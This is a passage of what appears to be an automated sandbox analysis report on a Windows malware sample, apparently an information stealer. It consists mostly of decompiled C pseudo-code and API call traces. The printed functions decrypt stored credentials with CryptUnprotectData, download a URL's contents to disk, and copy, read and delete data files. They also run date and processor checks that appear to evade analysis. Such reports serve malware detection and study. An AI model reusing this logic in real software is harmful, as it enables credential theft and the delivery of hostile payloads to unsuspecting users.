Part of subcall function 0040D93A: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,0040FBE1,?), ref: 0040D96B

lstrcat.KERNEL32(?,00000000), ref: 0040AFC9
lstrcat.KERNEL32(?), ref: 0040AFE4
lstrcat.KERNEL32(?,?), ref: 0040AFF8
lstrcat.KERNEL32(?), ref: 0040B00B

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 0040D910: GetFileAttributesA.KERNEL32(?,?,?,004088CC,?,?,?), ref: 0040D917

Part of subcall function 00404CAA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,0040FBE1), ref: 00404CF5
Part of subcall function 00404CAA: StrStrA.SHLWAPI(00000000,?,?,?,?,?,0040FBE1), ref: 00404D20
Part of subcall function 00404CAA: memcmp.MSVCRT ref: 00404D60
Part of subcall function 00404CAA: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00404D8B
Part of subcall function 00404CAA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,0040FBE1), ref: 00404DA1
Part of subcall function 00404CAA: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,0040FBE1), ref: 00404DBC

Part of subcall function 00404B20: CreateFileA.KERNEL32(h|@,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,00407C68,?), ref: 00404B3B
Part of subcall function 00404B20: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00407C68,?), ref: 00404B52
Part of subcall function 00404B20: LocalAlloc.KERNEL32(00000040,?,?,?,?,00407C68,?), ref: 00404B69
Part of subcall function 00404B20: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,00407C68,?), ref: 00404B80
Part of subcall function 00404B20: FindCloseChangeNotification.KERNEL32(?,?,?,?,00407C68,?), ref: 00404BA8

Part of subcall function 0040DCF4: GlobalAlloc.KERNEL32(00000000,?,00000104,?,?,?,?,0040B07F,?), ref: 0040DD00

StrStrA.SHLWAPI(00000000), ref: 0040B089
GlobalFree.KERNEL32(00000000), ref: 0040B151

Part of subcall function 00404BBC: CryptStringToBinaryA.CRYPT32(004035C3,00000000,00000001,00000000,?,00000000,00000000), ref: 00404BD4
Part of subcall function 00404BBC: LocalAlloc.KERNEL32(00000040,?,?,?,004035C3,?), ref: 00404BE2
Part of subcall function 00404BBC: CryptStringToBinaryA.CRYPT32(004035C3,00000000,00000001,00000000,?,00000000,00000000), ref: 00404BF8
Part of subcall function 00404BBC: LocalFree.KERNEL32(?,?,?,004035C3,?), ref: 00404C07

Part of subcall function 00404DEB: memcmp.MSVCRT ref: 00404E09
Part of subcall function 00404DEB: memset.MSVCRT ref: 00404E3B
Part of subcall function 00404DEB: LocalAlloc.KERNEL32(00000040,-000000E1), ref: 00404E71

lstrcat.KERNEL32(?,00000000), ref: 0040B0F4
StrCmpCA.SHLWAPI(?,0040FBE1), ref: 0040B10E
lstrcat.KERNEL32(0040B26D,?), ref: 0040B127
lstrcat.KERNEL32(0040B26D,00412120), ref: 0040B135

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: Locallstrcat$Alloc$File$CryptFreememset$BinaryGlobalStringmemcmp$AttributesChangeCloseCreateDataFindFolderNotificationPathReadSizeUnprotectlstrcpy
String ID:
API String ID: 4011891297-0
Opcode ID: 126c3f19da0913987f35f1ccbae693b8d8af52731e2fc01a5f0fbdedd2c82ff0
Instruction ID: 5ed9f9536ecbf845961f7a9f058dbbdc59f2a8f3bc9246b5ee370f20e7fabda6
Opcode Fuzzy Hash: 126c3f19da0913987f35f1ccbae693b8d8af52731e2fc01a5f0fbdedd2c82ff0
Instruction Fuzzy Hash: 12511AB1D0021EABCF01EBA4DC45ADEBBB9EB48304F1445B6E505B32A1EB35AB548F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040427A Relevance: 13.6, APIs: 9, Instructions: 102
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040427A(void* __ecx, void* __eflags, char* _a4, CHAR* _a16) {
				long _v8;
				long _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v80;
				void _v84;
				char _v144;
				void _v1168;
				void* __esi;
				void* _t32;
				void* _t34;
				signed int _t39;
				int _t56;
				void* _t58;
				signed int _t60;
				void* _t73;

				E0040EA82( &_a4, __ecx, _t73 - 0xc, __eflags);
				_push( &_v144);
				_t32 = E00403093();
				_t60 = 0xf;
				memcpy( &_v84, _t32, _t60 << 2);
				_t34 = InternetOpenA(0x40fbe1, 1, 0, 0, 0);
				_v16 = _t34;
				if(_t34 != 0) {
					_t39 =  *0x613784(_v80,  *0x6133c0);
					asm("sbb eax, eax");
					_t58 = InternetOpenUrlA(_v16, _a4, 0, 0, ( ~_t39 & 0xff800000) + 0x800100, 0);
					_v20 = CreateFileA(_a16, 0x40000000, 3, 0, 2, 0x80, 0);
					while(InternetReadFile(_t58,  &_v1168, 0x400,  &_v8) != 0) {
						__eflags = _v8;
						if(_v8 <= 0) {
							L5:
							__eflags = _v8 - 0x400;
							if(_v8 >= 0x400) {
								continue;
							}
						} else {
							_t56 = WriteFile(_v20,  &_v1168, _v8,  &_v12, 0);
							__eflags = _t56;
							if(_t56 != 0) {
								__eflags = _v8 - _v12;
								if(_v8 == _v12) {
									goto L5;
								}
							}
						}
						break;
					}
					_v24 =  &_v1168;
					memset(_v24, 0, 0x400 << 0);
					CloseHandle(_v20);
					InternetCloseHandle(_t58);
					InternetCloseHandle(_v16);
				}
				E004016EF(_a4);
				return E004016EF(_a16);
			}

0x0040428e
0x00404299
0x0040429a
0x004042a4
0x004042aa
0x004042b8
0x004042be
0x004042c3
0x004042d2
0x004042da
0x00404309
0x00404311
0x00404349
0x0040431b
0x0040431e
0x00404344
0x00404344
0x00404347
0x00000000
0x00000000
0x00404320
0x00404332
0x00404338
0x0040433a
0x0040433f
0x00404342
0x00000000
0x00000000
0x00404342
0x0040433a
0x00000000
0x0040431e
0x00404366
0x00404373
0x00404378
0x0040437f
0x00404388
0x00404388
0x00404391
0x004043a2

APIs

Part of subcall function 0040EA82: lstrcpy.KERNEL32(00000000,?), ref: 0040EAA1

Part of subcall function 00403093: malloc.MSVCRT ref: 004030C5
Part of subcall function 00403093: malloc.MSVCRT ref: 004030CB
Part of subcall function 00403093: malloc.MSVCRT ref: 004030D1
Part of subcall function 00403093: lstrlen.KERNEL32(000000FF,00000000,?), ref: 004030E3
Part of subcall function 00403093: InternetCrackUrlA.WININET(000000FF,00000000), ref: 004030EB

InternetOpenA.WININET(0040FBE1,00000001,00000000,00000000,00000000), ref: 004042B8
StrCmpCA.SHLWAPI(?), ref: 004042D2
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 004042F0
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0040430B
WriteFile.KERNEL32(?,?,0040A335,?,00000000), ref: 00404332
InternetReadFile.WININET(00000000,?,00000400,0040A335), ref: 00404356
CloseHandle.KERNEL32(?), ref: 00404378
InternetCloseHandle.WININET(00000000), ref: 0040437F
InternetCloseHandle.WININET(?), ref: 00404388

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandlemalloc$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2686625783-0
Opcode ID: 4e76cff48a7b30cde42770a010c9752bb4feb51240dabcd74020f7f109dc39b4
Instruction ID: 3c804911e8a50af2f1b7fcf032c98a5f548e134138cbcc6afb9a76b5ea54947b
Opcode Fuzzy Hash: 4e76cff48a7b30cde42770a010c9752bb4feb51240dabcd74020f7f109dc39b4
Instruction Fuzzy Hash: CE3150B1A00128BBDF209BA1DC49ADF7FB9FF44350F149466BA05F6290D7349A04CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC37 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040DC37(char* __eax, char* _a4, intOrPtr _a8) {
				char* _t12;
				void* _t13;
				void* _t15;
				CHAR* _t16;
				CHAR* _t18;

				_t18 = __eax;
				_t12 = StrStrA(__eax, _a4);
				if(_t12 != 0) {
					_t15 = _t12 - _t18;
					_t18 = "C:\\Users\\alfons\\Desktop\\";
					 *0x6136f0(_t18, _t18, _t15, _t13);
					_t3 = _t15 + "C:\\Users\\alfons\\Desktop\\"; // 0x555c3a43
					_t16 = _t3;
					 *_t16 = 0;
					wsprintfA(_t16, "%s%s", _a8,  *0x61367c(_a4) + _t12);
				}
				return _t18;
			}

0x0040dc3f
0x0040dc48
0x0040dc4c
0x0040dc51
0x0040dc55
0x0040dc5b
0x0040dc64
0x0040dc64
0x0040dc6a
0x0040dc7f
0x0040dc88
0x0040dc8e

APIs

StrStrA.SHLWAPI(?,00000010,?,?,?,00408F23,00000000,00000010), ref: 0040DC42
lstrcpyn.KERNEL32(C:\Users\user\Desktop\,?,00000000,?,?,?,?,00408F23,00000000,00000010), ref: 0040DC5B
lstrlen.KERNEL32(00000010,?,?,?,00408F23,00000000,00000010), ref: 0040DC6D
wsprintfA.USER32 ref: 0040DC7F

Strings

C:\Users\user\Desktop\, xrefs: 0040DC55, 0040DC5A
%s%s, xrefs: 0040DC79

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$C:\Users\user\Desktop\
API String ID: 1206339513-438050915
Opcode ID: 2286b38fea5981aff28b243d2fa86a2ae6202751bef60115f94574f8a030f658
Instruction ID: bc7d1c24f5bccf0b8029cae2e8d67b2f2bcc2f9f6c140b7e888b8d209e948162
Opcode Fuzzy Hash: 2286b38fea5981aff28b243d2fa86a2ae6202751bef60115f94574f8a030f658
Instruction Fuzzy Hash: E9F0E9322001267FD7010F599C49DE6BF6EEF456647084122F90992310C6B14A2486E4

Uniqueness

Uniqueness Score: -1.00%

Function 004070A2 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206
filestringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004070A2(void* __ecx, void* __eflags, CHAR* _a4, char _a16, char _a28, char _a40) {
				char _v8;
				char _v12;
				char _v24;
				CHAR* _v36;
				char _v48;
				char _v60;
				char _v72;
				char _v84;
				char _v96;
				char _v108;
				char _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t84;
				void* _t115;
				void* _t133;
				void* _t137;
				void* _t140;
				void* _t166;
				void* _t181;
				void* _t182;
				void* _t187;
				void* _t191;
				void* _t225;
				void* _t226;

				_t230 = __eflags;
				_t181 = __ecx;
				E0040EA50( &_v36, __eflags, 0x40fbe1);
				E0040EAEF(E0040EB6B( &_v36, _t181,  &_v72, __eflags,  *0x6133e4), _t181,  &_v36);
				E004016EF(_v72);
				_t84 = E0040D800(0x40fbe1,  &_v60, _t230, 0x1a);
				_pop(_t182);
				E0040EAEF(E0040EB29( &_v36, _t182, _t84,  &_v72, _t230), _t182,  &_v36);
				E004016EF(_v72);
				E004016EF(_v60);
				CopyFileA(_a4, _v36, 1);
				E0040EA50( &_v48, _t230, 0x40fbe1);
				E0040EAEF(E0040EB6B(E0040EB29(E0040EB6B(E0040EB29(E0040EB6B(E0040EB6B( &_v48, _t182,  &_v108, _t230,  *0x6133f4), _t182,  &_v96, _t230, 0x40fbe4), _t182,  &_a28,  &_v84, _t230), _t182,  &_v24, _t230, "_"), _t182,  &_a16,  &_v60, _t230), _t182,  &_v72, _t230,  *0x613248), _t182,  &_v48);
				E004016EF(_v72);
				E004016EF(_v60);
				E004016EF(_v24);
				E004016EF(_v84);
				E004016EF(_v96);
				E004016EF(_v108);
				_t115 =  *0x6135c0(_a4,  &_v12);
				if(_t115 == 0) {
					_t33 =  &_v8; // 0x407774
					_t133 =  *0x61357c(_v12,  *0x613054, 0xffffffff, _t33, _t115);
					_t226 = _t225 + 0x14;
					_t232 = _t133;
					if(_t133 == 0) {
						E0040EA50( &_v24, _t232, 0x40fbe1);
						while(1) {
							_t60 =  &_v8; // 0x407774
							_t137 =  *0x613598( *_t60);
							_pop(_t187);
							if(_t137 != 0x64) {
								break;
							}
							E0040EA50( &_v72, __eflags,  *0x6135b4(_v8, 0));
							_t140 =  *0x6135b4(_v8, 1);
							_pop(_t191);
							E0040EA50( &_v60, __eflags, _t140);
							E0040EAEF(E0040EB29( &_v24, _t191,  &_v72,  &_v108, __eflags), _t191,  &_v24);
							E004016EF(_v108);
							E0040EAEF(E0040EB6B( &_v24, _t191,  &_v96, __eflags, "\t"), _t191,  &_v24);
							E004016EF(_v96);
							E0040EAEF(E0040EB29( &_v24, _t191,  &_v60,  &_v84, __eflags), _t191,  &_v24);
							E004016EF(_v84);
							E0040EAEF(E0040EB6B( &_v24, _t191,  &_v120, __eflags, "\n"), _t191,  &_v24);
							E004016EF(_v120);
							E004016EF(_v60);
							E004016EF(_v72);
						}
						_t166 =  *0x61367c(_v24);
						_t234 = _t166 - 5;
						if(_t166 > 5) {
							_push( *0x61367c(_v24));
							_push(_v24);
							_t227 = _t226 - 0xc;
							E0040EA82( &_v48, _t187, _t226 - 0xc, _t234);
							E00401581( &_a40, _t227 - 0x50);
							_push( &_v120);
							E00403721(_t187, _t234);
							E004016EF(_v120);
						}
						E004016EF(_v24);
						E004016EF(0);
					}
					_t69 =  &_v8; // 0x407774
					 *0x61359c( *_t69);
					 *0x6135c4(_v12);
				}
				DeleteFileA(_v36);
				E004016EF(_v36);
				E004016EF(_v48);
				E004016EF(0);
				E004016EF(0);
				E004016EF(_a4);
				E004016EF(_a16);
				E004016EF(_a28);
				return E00401562( &_a40);
			}

0x004070a2
0x004070a2
0x004070b4
0x004070cd
0x004070d5
0x004070df
0x004070e6
0x004070f5
0x004070fd
0x00407105
0x00407112
0x0040711c
0x00407173
0x0040717b
0x00407183
0x0040718b
0x00407193
0x0040719b
0x004071a3
0x004071af
0x004071b9
0x004071c0
0x004071cf
0x004071d5
0x004071d8
0x004071da
0x004071e4
0x004072a6
0x004072a6
0x004072a9
0x004072af
0x004072b3
0x00000000
0x00000000
0x004071ff
0x00407209
0x00407210
0x00407215
0x0040722b
0x00407233
0x0040724b
0x00407253
0x00407269
0x00407271
0x00407289
0x00407291
0x00407299
0x004072a1
0x004072a1
0x004072bc
0x004072c2
0x004072c5
0x004072d0
0x004072d1
0x004072d7
0x004072dc
0x004072e9
0x004072f1
0x004072f2
0x004072fd
0x004072fd
0x00407305
0x0040730c
0x0040730c
0x00407311
0x00407314
0x0040731d
0x00407324
0x00407328
0x00407331
0x00407339
0x00407340
0x00407347
0x0040734f
0x00407357
0x0040735f
0x00407370

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

Part of subcall function 0040D800: GetSystemTime.KERNEL32(?,0040FBE1,00000000,?,?,?,?,?,?,?,004031B4,00000014), ref: 0040D825

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

CopyFileA.KERNEL32(?,?,00000001), ref: 00407112
lstrlen.KERNEL32(?), ref: 004072BC
lstrlen.KERNEL32(?), ref: 004072CA
DeleteFileA.KERNEL32(?,?), ref: 00407328

Strings

tw@, xrefs: 004071C0, 00407311, 004072A6, 004071C3

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID: tw@
API String ID: 211194620-3122378559
Opcode ID: 0a09321c74acedece65e0497bb9fd176f0de697a6b15d49439cdbbc73d32bde2
Instruction ID: 9c81e7e56225f2edbce61f9e4b9905f74d756b357890d0fea99132032e83c4d5
Opcode Fuzzy Hash: 0a09321c74acedece65e0497bb9fd176f0de697a6b15d49439cdbbc73d32bde2
Instruction Fuzzy Hash: 4F81B832D000199BCF00FBA6DD868CDB7B6AF04309B65497AF501B71B1DB39BE168B59

Uniqueness

Uniqueness Score: -1.00%

Function 00408B68 Relevance: 7.6, APIs: 5, Instructions: 96stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00408B87
StrCmpCA.SHLWAPI(00000000,00412140,?,?,?,?,?,0040CA73), ref: 00408BB9
strtok_s.MSVCRT ref: 00408C51

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 64ae19994803491e1e4490fa061b0e9568b5b3a33f95758382b0580e221bfe01
Instruction ID: 5b69b284fa7d800d09af16ebe99dce81860f9de80b26d4b76626b78ceb769baa
Opcode Fuzzy Hash: 64ae19994803491e1e4490fa061b0e9568b5b3a33f95758382b0580e221bfe01
Instruction Fuzzy Hash: 4E31C8B1A08105ABDB28DF54CA41B6A77B8FB04309F20507FE846FA1D1DB78DA518B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF63 Relevance: 7.6, APIs: 5, Instructions: 66
timeCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040CF63() {
				void* _v18;
				struct _SYSTEMTIME _v20;
				struct _SYSTEMTIME _v36;
				char _v48;
				struct _FILETIME _v60;
				struct _FILETIME _v68;
				void* __edi;
				long _t39;
				void* _t54;

				_v20.wYear = 0;
				_v68.dwLowDateTime = _v68.dwLowDateTime & 0x00000000;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v36.wYear = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v60.dwLowDateTime = _v60.dwLowDateTime & 0;
				asm("stosd");
				asm("stosd");
				GetSystemTime( &_v20);
				sscanf( *(E0040CE94( &_v48)),  *0x613348,  &(_v36.wDay),  &(_v36.wMonth),  &_v36);
				E004016EF(_v48);
				SystemTimeToFileTime( &_v20,  &_v68);
				SystemTimeToFileTime( &_v36,  &_v60);
				_t39 = _v68.dwHighDateTime;
				_t54 = _t39 - _v60.dwHighDateTime;
				if(_t54 >= 0) {
					if(_t54 > 0) {
						L3:
						ExitProcess(0);
					}
					_t39 = _v68.dwLowDateTime;
					if(_t39 > _v60.dwLowDateTime) {
						goto L3;
					}
				}
				return _t39;
			}

0x0040cf6f
0x0040cf74
0x0040cf7d
0x0040cf7e
0x0040cf7f
0x0040cf80
0x0040cf84
0x0040cf8d
0x0040cf8e
0x0040cf8f
0x0040cf90
0x0040cf94
0x0040cf9c
0x0040cfa1
0x0040cfa7
0x0040cfcd
0x0040cfda
0x0040cfe9
0x0040cff9
0x0040cfff
0x0040d003
0x0040d007
0x0040d009
0x0040d015
0x0040d017
0x0040d017
0x0040d00b
0x0040d013
0x00000000
0x00000000
0x0040d013
0x0040d021

APIs

GetSystemTime.KERNEL32(?), ref: 0040CFA7
sscanf.NTDLL ref: 0040CFCD
SystemTimeToFileTime.KERNEL32(?,?), ref: 0040CFE9
SystemTimeToFileTime.KERNEL32(?,?), ref: 0040CFF9
ExitProcess.KERNEL32 ref: 0040D017

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: fb9363f5e5473fc5d01e554f498f755c1f912a8f0e437651766828f7dd826e3d
Instruction ID: 3e27c07c27f812d545b6922070078a8bbb2ceb19f6194683ca3203cd1e185a8b
Opcode Fuzzy Hash: fb9363f5e5473fc5d01e554f498f755c1f912a8f0e437651766828f7dd826e3d
Instruction Fuzzy Hash: 1A211A72018701BFD341DFA4C84599BF7E9EB88314F405E2AF695E2160E735E6098B57

Uniqueness

Uniqueness Score: -1.00%

Function 0040D364 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040D364() {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v1020;
				intOrPtr* _t29;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr* _t41;

				_push( &_v8);
				_t41 = 0;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				_push(0);
				while(1) {
					_push(0xffff);
					if( *0x6135ec() != 0) {
						break;
					}
					if(GetLastError() != 0x7a) {
						if(_t41 != 0) {
							E0040D770(_t41);
						}
						L15:
						return "0";
					}
					if(_t41 != 0) {
						E0040D770(_t41);
					}
					_t41 = E0040D78D(_v8);
					if(_t41 == 0) {
						goto L15;
					} else {
						_push( &_v8);
						_push(_t41);
						continue;
					}
				}
				_t40 = _v8;
				_t29 = _t41;
				if(_t40 <= 0) {
					L11:
					E0040D770(_t41);
					if(_v12 == 0) {
						goto L15;
					}
					_t18 =  &_v12; // 0x412120
					wsprintfA( &_v1020, "%d",  *_t18);
					return  &_v1020;
				} else {
					goto L8;
				}
				do {
					L8:
					_t29 = _t29 + _v20;
					if( *_t29 == 0) {
						_v12 = _v12 + 1;
					}
					_t39 =  *((intOrPtr*)(_t29 + 4));
					_v16 = _v16 + _t39;
					_v20 = _t39;
				} while (_v16 < _t40);
				goto L11;
			}

0x0040d375
0x0040d376
0x0040d378
0x0040d37b
0x0040d37e
0x0040d381
0x0040d384
0x0040d3b6
0x0040d3b6
0x0040d3bf
0x00000000
0x00000000
0x0040d395
0x0040d410
0x0040d413
0x0040d418
0x0040d419
0x00000000
0x0040d419
0x0040d399
0x0040d39c
0x0040d3a1
0x0040d3aa
0x0040d3af
0x00000000
0x0040d3b1
0x0040d3b4
0x0040d3b5
0x00000000
0x0040d3b5
0x0040d3af
0x0040d3c1
0x0040d3c4
0x0040d3c8
0x0040d3e2
0x0040d3e3
0x0040d3ec
0x00000000
0x00000000
0x0040d3ee
0x0040d3fd
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d3ca
0x0040d3ca
0x0040d3ca
0x0040d3cf
0x0040d3d1
0x0040d3d1
0x0040d3d4
0x0040d3d7
0x0040d3da
0x0040d3dd
0x00000000

APIs

GetLastError.KERNEL32 ref: 0040D38C
GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040D3B7
wsprintfA.USER32 ref: 0040D3FD

Part of subcall function 0040D770: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040D77E
Part of subcall function 0040D770: HeapFree.KERNEL32(00000000), ref: 0040D785

Strings

!A, xrefs: 0040D3EE

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: Heap$ErrorFreeInformationLastLogicalProcessProcessorwsprintf
String ID: !A
API String ID: 879827129-1246296855
Opcode ID: a382b2af1320d707159b7c6f77c681c6b2e2af3336ed61b0f1042c7bf8fe8480
Instruction ID: 62624d108b095070743b4c5cde25b45839d81636d570cb7b10d7e77c56a8ca9d
Opcode Fuzzy Hash: a382b2af1320d707159b7c6f77c681c6b2e2af3336ed61b0f1042c7bf8fe8480
Instruction Fuzzy Hash: 7F216F76D0011AAFCB109FD5D8C18AEB7B9EB84705B20407FE511F2290DB389E899B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0040DA20
